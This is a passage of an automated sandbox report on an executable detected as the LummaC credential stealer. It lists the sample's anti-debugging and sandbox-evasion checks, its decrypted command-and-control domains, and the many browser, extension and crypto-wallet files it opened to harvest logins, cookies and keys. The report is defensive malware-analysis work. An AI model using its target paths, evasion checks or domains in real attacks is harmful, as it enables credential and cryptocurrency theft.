              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
              Source: zhQFKte2vX.exe, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549571155.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
              Source: zhQFKte2vX.exe, 00000000.00000003.1577914312.0000000005B6C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549421174.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1549571155.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1637773020.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668435335.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
              Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
              Source: zhQFKte2vX.exe, 00000000.00000003.1577997515.0000000005B5F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: SICE
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: rapeflowwj.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: crosshuaht.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sustainskelet.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: aspecteirs.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: energyaffai.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: necklacebudi.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: discokeyus.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: grannyejh.lat
              Source: zhQFKte2vX.exe, 00000000.00000003.1468581716.0000000004EF0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: sweepyribs.lat
              Source: zhQFKte2vX.exe, 00000000.00000002.1750925623.00000000006B0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: zhQFKte2vX.exe, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011F0000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672486237.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1753601900.0000000005B10000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672438944.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750410108.00000000011F1000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1672300135.0000000005B1D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000002.1751718240.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1673104494.00000000011E2000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1750136047.00000000011F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: zhQFKte2vX.exe PID: 4208, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: zhQFKte2vX.exeString found in binary or memory: %appdata%\Electrum\wallets
              Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: zhQFKte2vX.exeString found in binary or memory: Wallets/JAXX New Version
              Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: zhQFKte2vX.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: zhQFKte2vX.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: zhQFKte2vX.exe, 00000000.00000003.1638145543.00000000011F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
              Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.0000000001238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: zhQFKte2vX.exe, 00000000.00000003.1637773020.0000000001238000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\zhQFKte2vX.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
